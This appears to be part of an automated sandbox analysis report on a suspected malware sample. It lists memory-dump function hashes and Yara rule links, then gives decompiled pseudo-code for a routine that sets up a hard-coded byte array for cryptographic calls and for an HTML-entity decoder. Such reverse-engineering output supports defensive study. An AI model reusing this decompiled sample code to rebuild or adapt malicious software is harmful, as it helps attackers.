                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d2ae530b94216ded287afa4a3492bedce49376d3a879f5626317ac993fb9414
                                                                      • Instruction ID: 88be8c9b6b81a5e4bf70936bf1fd8cce8d986feeb13bc6f8cdf72d056400aea3
                                                                      • Opcode Fuzzy Hash: 7d2ae530b94216ded287afa4a3492bedce49376d3a879f5626317ac993fb9414
                                                                      • Instruction Fuzzy Hash: 7ED0E235D6AA288BCF14DFA8AC511FDF778FB46315F0474A2D108A3551D7328A558E14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05205CCE, Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f98fe45fa9a887f1ac0a99191c981a235ebd6045680074a2e16b8bd9f5492fb7
                                                                      • Instruction ID: 6e334e9dce95f8f81d3f03f09a7dd5307478bbab1332f83487ab88c7c2b83fe5
                                                                      • Opcode Fuzzy Hash: f98fe45fa9a887f1ac0a99191c981a235ebd6045680074a2e16b8bd9f5492fb7
                                                                      • Instruction Fuzzy Hash: 34D0E235E562288BCB10DFA8AA512EDF7B1AB46214F0070A2C209B7581D6305A248F24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05200728, Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction ID: 2e7da7b3fce29512793a2149e2aab0fa4f94c818ab5678ed521d7098e5895e7f
                                                                      • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction Fuzzy Hash: 09B09236E550089AEB008FC8B4493FCF770EB82229F102063C218B3591827586684A89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052017F8, Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction ID: a259fc3ab7f99df82c4d0e807894eaf0d5a32ab8eed34812b420f27de761fb7c
                                                                      • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction Fuzzy Hash: 4BB0923AE150089ADB008FC4B8413FCF7B4EB86229F102063C218B3551837182688689
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052014C0, Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.324951077.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction ID: ad5f1f0b32a761acd4629b77e4977772a155a696dfc58c0b0c8219617391b9c5
                                                                      • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                      • Instruction Fuzzy Hash: D4B0923AE150089ADB008EC4B8813FCF770EB82229F142163C219B3552827582688689
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009CB1E6, Relevance: 60.3, Strings: 48, Instructions: 282COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 75%
                                                                      			E009CB1E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				signed char* _v16;
				signed char* _v20;
				signed char* _v24;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				signed char* _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				signed char* _v284;
				char _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				signed int _v300;
				char _v320;
				void _v348;
				void* __ebx;
				void* __edi;
				void* _t178;
				void* _t180;
				void* _t182;
				signed char* _t184;
				intOrPtr _t219;
				signed int _t231;
				intOrPtr _t242;

				_t242 = __ecx;
				_push(0x44356c);
				_v292 = __ecx;
				_a4 = _a4 + 4;
				_t178 = E009D105D(_a4 + 4);
				_push(_t178);
				L00A0B581();
				_t219 = _a8;
				if(_t178 == 0) {
					E009D1069(E009D105D(_t219 + 4) | 0xffffffff, __ecx + 0x2c, _t216);
				}
				_push(0x44357c);
				_t180 = E009D105D(_a4);
				_push(_t180);
				L00A0B581();
				if(_t180 == 0) {
					E009D1069(E009D105D(_t219 + 4) | 0xffffffff, _t242 + 0x40, _t212);
				}
				_push(0x443588);
				_t182 = E009D105D(_a4);
				_push(_t182);
				L00A0B581();
				if(_t182 == 0) {
					E009D1069(E009D105D(_t219 + 4) | 0xffffffff, _t242 + 0x54, _t208);
				}
				_push(0x443598);
				_t184 = E009D105D(_a4);
				_push(_t184);
				L00A0B581();
				if(_t184 != 0) {
					L13:
					return _t184;
				} else {
					_v24 = _t184;
					_v16 = _t184;
					_v20 = _t184;
					_v280 = 0x1d;
					_v279 = 0xac;
					_v278 = 0xa8;
					_v277 = 0xf8;
					_v276 = 0xd3;
					_v275 = 0xb8;
					_v274 = 0x48;
					_v273 = 0x3e;
					_v272 = 0x48;
					_v271 = 0x7d;
					_v270 = 0x3e;
					_v269 = 0xa;
					_v268 = 0x62;
					_v267 = 7;
					_v266 = 0xdd;
					_v265 = 0x26;
					_v264 = 0xe6;
					_v263 = 0x67;
					_v262 = 0x81;
					_v261 = 3;
					_v260 = 0xe7;
					_v259 = 0xb2;
					_v258 = 0x13;
					_v257 = 0xa5;
					_v256 = 0xb0;
					_v255 = 0x79;
					_v254 = 0xee;
					_v253 = 0x4f;
					_v252 = 0xf;
					_v251 = 0x41;
					_v250 = 0x15;
					_v249 = 0xed;
					_v248 = 0x7b;
					_v247 = 0x14;
					_v246 = 0x8c;
					_v245 = 0xe5;
					_v244 = 0x4b;
					_v243 = 0x46;
					_v242 = 0xd;
					_v241 = 0xc1;
					_v240 = 0x8e;
					_v239 = 0xfe;
					_v238 = 0xd6;
					_v237 = 0xe7;
					_v236 = 0x27;
					_v235 = 0x75;
					_v234 = 6;
					_v233 = 0x8b;
					_v232 = 0x49;
					_v231 = _t184;
					_v230 = 0xdc;
					_v229 = 0xf;
					_v228 = 0x30;
					_v227 = 0xa0;
					_v226 = 0x9e;
					_v225 = 0xfd;
					_v224 = 9;
					_v223 = 0x85;
					_v222 = 0xf1;
					_v221 = 0xc8;
					_v220 = 0xaa;
					_v219 = 0x75;
					_v218 = 0xc1;
					_v217 = 8;
					_v216 = 5;
					_v215 = 0x79;
					_v214 = 1;
					_v213 = 0xe2;
					_v212 = 0x97;
					_v211 = 0xd8;
					_v210 = 0xaf;
					_v209 = 0x80;
					_v208 = 0x38;
					_v207 = 0x60;
					_v206 = 0xb;
					_v205 = 0x71;
					_v204 = 0xe;
					_v203 = 0x68;
					_push(0x80);
					_push(_t184);
					_push( &_v152);
					_v202 = 0x53;
					_v201 = 0x77;
					_v200 = 0x2f;
					_v199 = 0xf;
					_v198 = 0x61;
					_v197 = 0xf6;
					_v196 = 0x1d;
					_v195 = 0x8e;
					_v194 = 0x8f;
					_v193 = 0x5c;
					_v192 = 0xb2;
					_v191 = 0x3d;
					_v190 = 0x21;
					_v189 = 0x74;
					_v188 = 0x40;
					_v187 = 0x4b;
					_v186 = 0xb5;
					_v185 = 6;
					_v184 = 0x6e;
					_v183 = 0xab;
					_v182 = 0x7a;
					_v181 = 0xbd;
					_v180 = 0x8b;
					_v179 = 0xa9;
					_v178 = 0x7e;
					_v177 = 0x32;
					_v176 = 0x8f;
					_v175 = 0x6e;
					_v174 = 6;
					_v173 = 0x24;
					_v172 = 0xd9;
					_v171 = 0x29;
					_v170 = 0xa4;
					_v169 = 0xa5;
					_v168 = 0xbe;
					_v167 = 0x26;
					_v166 = 0x23;
					_v165 = 0xfd;
					_v164 = 0xee;
					_v163 = 0xf1;
					_v162 = 0x4c;
					_v161 = 0xf;
					_v160 = 0x74;
					_v159 = 0x5e;
					_v158 = 0x58;
					_v157 = 0xfb;
					_v156 = 0x91;
					_v155 = 0x74;
					_v154 = 0xef;
					_v153 = 0x91;
					L00A0B531();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t231 = 7;
					_push(0x11);
					asm("movsb");
					_push( &_v320);
					_push( &_v152);
					memcpy( &_v348, 0x4435b8, _t231 << 2);
					L00A0B575();
					_v8 =  &_v280;
					_v296 =  *((intOrPtr*)(_t219 + 0x18));
					_v12 = 0x90;
					_v300 =  *(_t219 + 2) & 0x0000ffff;
					if(E009CC860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
						L9:
						_t184 = _v284;
						if(_t184 != 0) {
							E009D118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
							_t184 =  *0x4430d8(_v284);
						}
						L11:
						if(_v24 == 0) {
							goto L13;
						}
						return  *0x443100(_v24);
					}
					_push(0x1c);
					_push( &_v348);
					_push( &_v152);
					L00A0B575();
					_v8 =  &_v280;
					_v12 = 0x9b;
					_t184 = E009CC860( &_v24,  &_v300,  &_v12, 0,  &_v288);
					if(_t184 == 0) {
						goto L11;
					}
					goto L9;
				}
			}

























































































































































                                                                      0x009cb1f8
                                                                      0x009cb1fa
                                                                      0x009cb1ff
                                                                      0x009cb205
                                                                      0x009cb208
                                                                      0x009cb20d
                                                                      0x009cb20e
                                                                      0x009cb215
                                                                      0x009cb21a
                                                                      0x009cb22b
                                                                      0x009cb22b
                                                                      0x009cb233
                                                                      0x009cb238
                                                                      0x009cb23d
                                                                      0x009cb23e
                                                                      0x009cb247
                                                                      0x009cb258
                                                                      0x009cb258
                                                                      0x009cb260
                                                                      0x009cb265
                                                                      0x009cb26a
                                                                      0x009cb26b
                                                                      0x009cb274
                                                                      0x009cb285
                                                                      0x009cb285
                                                                      0x009cb28d
                                                                      0x009cb292
                                                                      0x009cb297
                                                                      0x009cb298
                                                                      0x009cb2a1
                                                                      0x009cb744
                                                                      0x009cb744
                                                                      0x009cb2a7
                                                                      0x009cb2a7
                                                                      0x009cb2aa
                                                                      0x009cb2ad
                                                                      0x009cb2b0
                                                                      0x009cb2b7
                                                                      0x009cb2be
                                                                      0x009cb2c5
                                                                      0x009cb2cc
                                                                      0x009cb2d3
                                                                      0x009cb2da
                                                                      0x009cb2e1
                                                                      0x009cb2e8
                                                                      0x009cb2ef
                                                                      0x009cb2f6
                                                                      0x009cb2fd
                                                                      0x009cb304
                                                                      0x009cb30b
                                                                      0x009cb312
                                                                      0x009cb319
                                                                      0x009cb320
                                                                      0x009cb327
                                                                      0x009cb32e
                                                                      0x009cb335
                                                                      0x009cb33c
                                                                      0x009cb343
                                                                      0x009cb34a
                                                                      0x009cb351
                                                                      0x009cb358
                                                                      0x009cb35f
                                                                      0x009cb366
                                                                      0x009cb36d
                                                                      0x009cb374
                                                                      0x009cb37b
                                                                      0x009cb382
                                                                      0x009cb389
                                                                      0x009cb390
                                                                      0x009cb397
                                                                      0x009cb39e
                                                                      0x009cb3a5
                                                                      0x009cb3ac
                                                                      0x009cb3b3
                                                                      0x009cb3ba
                                                                      0x009cb3c1
                                                                      0x009cb3c8
                                                                      0x009cb3cf
                                                                      0x009cb3d6
                                                                      0x009cb3dd
                                                                      0x009cb3e4
                                                                      0x009cb3eb
                                                                      0x009cb3f2
                                                                      0x009cb3f9
                                                                      0x009cb400
                                                                      0x009cb407
                                                                      0x009cb40d
                                                                      0x009cb414
                                                                      0x009cb41b
                                                                      0x009cb422
                                                                      0x009cb429
                                                                      0x009cb430
                                                                      0x009cb437
                                                                      0x009cb43e
                                                                      0x009cb445
                                                                      0x009cb44c
                                                                      0x009cb453
                                                                      0x009cb45a
                                                                      0x009cb461
                                                                      0x009cb468
                                                                      0x009cb46f
                                                                      0x009cb476
                                                                      0x009cb47d
                                                                      0x009cb484
                                                                      0x009cb48b
                                                                      0x009cb492
                                                                      0x009cb499
                                                                      0x009cb4a0
                                                                      0x009cb4a7
                                                                      0x009cb4ae
                                                                      0x009cb4b5
                                                                      0x009cb4bc
                                                                      0x009cb4c3
                                                                      0x009cb4ca
                                                                      0x009cb4d1
                                                                      0x009cb4d6
                                                                      0x009cb4dd
                                                                      0x009cb4de
                                                                      0x009cb4e5
                                                                      0x009cb4ec
                                                                      0x009cb4f3
                                                                      0x009cb4fa
                                                                      0x009cb501
                                                                      0x009cb508
                                                                      0x009cb50f
                                                                      0x009cb516
                                                                      0x009cb51d
                                                                      0x009cb524
                                                                      0x009cb52b
                                                                      0x009cb532
                                                                      0x009cb539
                                                                      0x009cb540
                                                                      0x009cb547
                                                                      0x009cb54e
                                                                      0x009cb555
                                                                      0x009cb55c
                                                                      0x009cb563
                                                                      0x009cb56a
                                                                      0x009cb571
                                                                      0x009cb578
                                                                      0x009cb57f
                                                                      0x009cb586
                                                                      0x009cb58d
                                                                      0x009cb594
                                                                      0x009cb59b
                                                                      0x009cb5a2
                                                                      0x009cb5a9
                                                                      0x009cb5b0
                                                                      0x009cb5b7
                                                                      0x009cb5be
                                                                      0x009cb5c5
                                                                      0x009cb5cc
                                                                      0x009cb5d3
                                                                      0x009cb5da
                                                                      0x009cb5e1
                                                                      0x009cb5e8
                                                                      0x009cb5ef
                                                                      0x009cb5f6
                                                                      0x009cb5fd
                                                                      0x009cb604
                                                                      0x009cb60b
                                                                      0x009cb612
                                                                      0x009cb619
                                                                      0x009cb620
                                                                      0x009cb627
                                                                      0x009cb62e
                                                                      0x009cb635
                                                                      0x009cb63c
                                                                      0x009cb64c
                                                                      0x009cb64d
                                                                      0x009cb64e
                                                                      0x009cb651
                                                                      0x009cb652
                                                                      0x009cb653
                                                                      0x009cb65b
                                                                      0x009cb65c
                                                                      0x009cb66e
                                                                      0x009cb66f
                                                                      0x009cb671
                                                                      0x009cb67c
                                                                      0x009cb682
                                                                      0x009cb68f
                                                                      0x009cb696
                                                                      0x009cb6bb
                                                                      0x009cb704
                                                                      0x009cb704
                                                                      0x009cb70c
                                                                      0x009cb720
                                                                      0x009cb72b
                                                                      0x009cb72b
                                                                      0x009cb731
                                                                      0x009cb735
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009cb73a
                                                                      0x009cb6bd
                                                                      0x009cb6c5
                                                                      0x009cb6cc
                                                                      0x009cb6cd
                                                                      0x009cb6db
                                                                      0x009cb6f4
                                                                      0x009cb6fb
                                                                      0x009cb702
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009cb702

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000005.00000002.320628061.00000000009C0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000005.00000002.320869373.0000000000A42000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                      • API String ID: 0-140969752
                                                                      • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                      • Instruction ID: 4a3186cf58eb151aff38f0a6fce157ab463afafe7842a15415aa0b05c46c087f
                                                                      • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                      • Instruction Fuzzy Hash: F0F100218087E9D9DB32C7788C09BCDBE645B23324F0843D9D1E97A2D2D3B54BC58B62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A2E67A, Relevance: 57.8, Strings: 46, Instructions: 307COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 80%
                                                                      			E00A2E67A(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v76;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr* _t200;
				char* _t202;
				signed int _t203;
				intOrPtr _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				char _t215;
				intOrPtr _t216;
				short _t219;
				signed int _t224;
				intOrPtr* _t225;
				intOrPtr _t230;
				intOrPtr* _t231;
				intOrPtr* _t233;
				intOrPtr* _t238;
				signed int _t239;
				signed int _t242;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t245;
				void* _t247;
				void* _t248;
				void* _t249;

				_v64 = 0x413f68;
				_v60 = 0x413f70;
				_v56 = 0x413f74;
				_v52 = 0x413f78;
				_v48 = 0x413f80;
				_v44 = 0x413f88;
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = 0x413f90;
				_v464 = 0x413f98;
				_v460 = 0x413fa0;
				_v456 = 0x413fa8;
				_v452 = 0x413fb0;
				_v448 = 0x413fb8;
				_v444 = 0x413fc0;
				_v440 = 0x413fc8;
				_v436 = 0x413fd0;
				_v432 = 0x413fd8;
				_v428 = 0x413fe0;
				_v424 = 0x413fe8;
				_v420 = 0x413ff0;
				_v416 = 0x413ff8;
				_v412 = 0x414000;
				_v408 = 0x414008;
				_v404 = 0x414010;
				_v400 = 0x414018;
				_v396 = 0x414020;
				_v392 = 0x414028;
				_v388 = 0x414030;
				_v384 = 0x414038;
				_v380 = 0x414040;
				_v376 = 0x414048;
				_v372 = 0x414050;
				_v368 = 0x414058;
				_v364 = 0x414060;
				_v360 = 0x414068;
				_v356 = 0x414070;
				_v352 = 0x414078;
				_v348 = 0x414080;
				_v344 = 0x414088;
				_v340 = 0x414090;
				_v336 = 0x414098;
				_v332 = 0x4140a0;
				_v328 = 0x4140a8;
				_v324 = 0x4140b0;
				_v320 = 0x4140b8;
				_v316 = 0x4140c0;
				_v312 = 0x4140c8;
				_v308 = 0x4140d0;
				_v304 = 0x4140d8;
				_v300 = 0x4140e0;
				_v296 = 0x4140e8;
				_v292 = 0x4140f0;
				_v288 = 0x4140f8;
				_v284 = 0x414100;
				_v280 = 0x414108;
				_v276 = 0x414110;
				_v272 = 0x414118;
				_v268 = 0x414120;
				_v264 = 0x414128;
				_v260 = 0x414130;
				_v256 = 0x414138;
				_v252 = 0x414140;
				_v248 = 0x414148;
				_v244 = 0x414150;
				_v240 = 0x414158;
				_v236 = 0x414160;
				_v232 = 0x414168;
				_v228 = 0x414170;
				_v224 = 0x414178;
				_v220 = 0x414180;
				_v216 = 0x414188;
				_v212 = 0x414190;
				_v208 = 0x414198;
				_v204 = 0x4141a0;
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t224 = 0;
				_t247 = 0;
				_v200 = 0x4141a8;
				_v196 = 0x4141b0;
				_v192 = 0x4141b8;
				_v188 = 0x4141c0;
				_v184 = 0x4141c8;
				_v180 = 0x4141d0;
				_v176 = 0x4141d8;
				_v172 = 0x4141e0;
				_v168 = 0x4141e8;
				_v164 = 0x4141f0;
				_v160 = 0x4141f8;
				_v156 = 0x414200;
				_v152 = 0x414208;
				_v148 = 0x414210;
				_v144 = 0x414218;
				_v140 = 0x414220;
				_v136 = 0x414228;
				_v132 = 0x414230;
				_v128 = 0x414238;
				_v124 = 0x414240;
				_v120 = 0x414248;
				_v116 = 0x414250;
				_v112 = 0x414258;
				_v108 = 0x414260;
				_v104 = 0x414268;
				_v100 = 0x414270;
				_v96 = 0x414278;
				_v92 = 0x414280;
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t224;
					 *_t202 = 0;
					if(_a20 == 0 || _t224 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t247) {
					_t225 = _t247 + _t200;
					_t203 =  *_t225;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t224 + _a4)) = _t203;
							_t224 = _t224 + 1;
						} else {
							if(_t224 != _v28) {
								 *((char*)(_t224 + _a4)) = 0x20;
								_t224 = _t224 + 1;
								if(_a20 != 0 && _t224 == 1) {
									_t224 = 0;
								}
							}
							_v28 = _t224;
						}
						_t247 = _t247 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t247 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t242 = 0;
					_v36 = _t225 + 1;
					while(1) {
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						L00A303B6();
						_push(_t203);
						_push( *((intOrPtr*)(_t248 + _t242 * 4 - 0x3c)));
						_v8 = _t203;
						_push(_v36);
						L00A304AE();
						_t249 = _t249 + 0x10;
						if(_t203 == 0) {
							break;
						}
						_t242 = _t242 + 1;
						if(_t242 < 6) {
							continue;
						}
						_t207 = _a8;
						if( *((char*)(_t247 + _t207 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t209 =  *((intOrPtr*)(_t248 + _v8 * 4 - 0x1d0));
								_push(_t209);
								_v40 = _t209;
								L00A303B6();
								_t243 = _t209;
								_push(_t243);
								_push(_v40);
								_push(_v36);
								L00A304AE();
								_t249 = _t249 + 0x10;
								if(_t209 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t224 + _a4)) = _v8 - 0x5f;
							_t224 = _t224 + 1;
							_t247 = _t247 + _t243 + 1;
							goto L43;
						}
						_t128 = _t207 + 2; // 0x2
						_t244 = _t247 + _t128;
						_t230 =  *_t244;
						if(_t230 == 0x78 || _t230 == 0x58) {
							_t159 = _t207 + 3; // 0x3
							_t238 = _t247 + _t159;
							_t231 = _t238;
							_t245 = 0;
							while(1) {
								_t212 =  *_t231;
								if(_t212 == 0) {
									break;
								}
								if(_t212 == 0x3b) {
									L27:
									if(_t245 <= 0) {
										goto L29;
									}
									_push(_t245);
									_push(_t238);
									_push( &_v88);
									L00A3043C();
									 *((char*)(_t248 + _t245 - 0x54)) = 0;
									_t215 = E00A25384( &_v88,  &_v88);
									_t249 = _t249 + 0x10;
									 *((char*)(_t224 + _a4)) = _t215;
									_t224 = _t224 + 1;
									_t247 = _t247 + _t245 + 4;
									goto L43;
								}
								_t245 = _t245 + 1;
								if(_t245 >= 4) {
									break;
								}
								_t231 = _t231 + 1;
							}
							_t245 = _t245 | 0xffffffff;
							goto L27;
						} else {
							_t233 = _t244;
							_t239 = 0;
							while(1) {
								_t216 =  *_t233;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									_v8 = _t239;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									L00A3043C();
									 *((char*)(_t248 + _v8 - 0x48)) = 0;
									_t219 =  &_v76;
									L00A30430();
									_t249 = _t249 + 0x10;
									_v32 = _t219;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									 *0x4120d4(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0, _t219,  &_v76, _t244, _v8);
									 *((char*)(_t224 + _a4)) = _v12;
									_t224 = _t224 + 1;
									_t247 = _t247 + _v8 + 3;
									goto L43;
								}
								_t239 = _t239 + 1;
								if(_t239 >= 6) {
									break;
								}
								_t233 = _t233 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t224 + _a4)) =  *((intOrPtr*)(_t248 + _t242 - 0x14));
					_t224 = _t224 + 1;
					_t247 = _t247 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}
















































































































































                                                                      0x00a2e685
                                                                      0x00a2e68c
                                                                      0x00a2e693
                                                                      0x00a2e69a
                                                                      0x00a2e6a1
                                                                      0x00a2e6a8
                                                                      0x00a2e6af
                                                                      0x00a2e6b3
                                                                      0x00a2e6b7
                                                                      0x00a2e6bb
                                                                      0x00a2e6bf
                                                                      0x00a2e6c3
                                                                      0x00a2e6c7
                                                                      0x00a2e6d1
                                                                      0x00a2e6db
                                                                      0x00a2e6e5
                                                                      0x00a2e6ef
                                                                      0x00a2e6f9
                                                                      0x00a2e703
                                                                      0x00a2e70d
                                                                      0x00a2e717
                                                                      0x00a2e721
                                                                      0x00a2e72b
                                                                      0x00a2e735
                                                                      0x00a2e73f
                                                                      0x00a2e749
                                                                      0x00a2e753
                                                                      0x00a2e75d
                                                                      0x00a2e767
